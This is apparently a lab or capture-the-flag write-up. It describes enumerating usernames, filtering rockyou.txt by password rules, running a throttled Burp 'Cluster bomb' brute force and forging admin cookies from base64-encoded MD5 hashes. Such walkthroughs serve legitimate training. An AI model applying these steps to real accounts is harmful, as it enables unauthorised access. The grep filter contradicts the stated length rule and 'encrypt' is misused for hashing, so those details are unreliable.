Before attempting to launch any brute force attacks, the first step is to create a legitimate user account to avoid unnecessary delays.
The application requires specific password criteria: starting with a capital letter, containing at least one special character ($, #, @), ending with a digit, and being shorter than 20 characters. Additionally, it must contain at least one lowercase character.
Upon successful account creation, an attempt to send a message to the “admin” user fails, indicating that the “admin” account does not exist.
By using Burp Suite and analyzing the HTTP history, we discover the existence of “guest” and “support” users.
Armed with this knowledge, we proceed to attempt various combinations to gain access to the application.
As you see guest and support user's exist.
We try different usernames such as “us.support”, “support.us”, “ussupport”, and “supportus,” but none of these usernames grant us access.
After exploring other payload options like “country-codes.txt”, we successfully identify that the “support.us” username allows us to proceed further.
Finding the associated password is the next step once we have the proper username. Based on the previously given password criteria, we apply specific filters to the rockyou.txt wordlist and use: being less than 20 characters in length, beginning with an uppercase letter, including at least one special character ($, #, or @), ending with a digit, and including at least one lowercase character.
wc -l /usr/share/wordlists/rockyou.txt14344391 /usr/share/wordlists/rockyou.txt
sudo wc /usr/share/wordlists/rockyou.txt
14344391 14442061 139921497 /usr/share/wordlists/rockyou.txt
sudo grep '^[[:upper:]]' /usr/share/wordlists/rockyou.txt |grep '[$@#]' |grep '[[:lower:]]' |grep -E '.{19,}[0-9]$'
IuBitzik@_B3b3_&*%1990
TrillPrincessMentality#1
Sn@tch01159552520096
[email protected]
Mustang#firebird1995
Mi$un'sbrthd8iz12256
Kaalyah,Jarren,Desmond,Terence#1
[email protected]
[email protected]
Blessedbe1@endofritual2
BisocaBuzau#20061985
Barrackpore.1998@05,1411
B@BYme&my$exiness123
ABCDefgh@BungurBaru17
We proceed with a “Cluster bomb” attack using Burp Suite, with a maximum concurrent request limit of 5 and a delay of 30000 milliseconds between requests. This approach helps avoid excessive lockouts and improves the chances of successfully cracking the password.
After running the attack, we successfully identify the password “Mustang#firebird1995” that meets all the specified criteria.
Upon logging in with the discovered credentials, we inspect the login response to find a set of cookies encoded in Base64. Decoding these cookies provides two key-value pairs: “434990c8a25d2be94863561ae98bd682:support
” and “af6172da1f353a9b9bbbaac3ac1ed4c4:support.us
”.
To gain access as an admin, we encrypt these key-value pairs to reveal the corresponding admin credentials: “admin.us = 5e2dea20edeb5de788969bd9d441aaa9
” and “admin = 21232f297a57a5a743894a0e4a801fc3
”. These credentials can be used to access the admin account.
Encode base64:
NWUyZGVhMjBlZGViNWRlNzg4OTY5YmQ5ZDQ0MWFhYTk6MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM=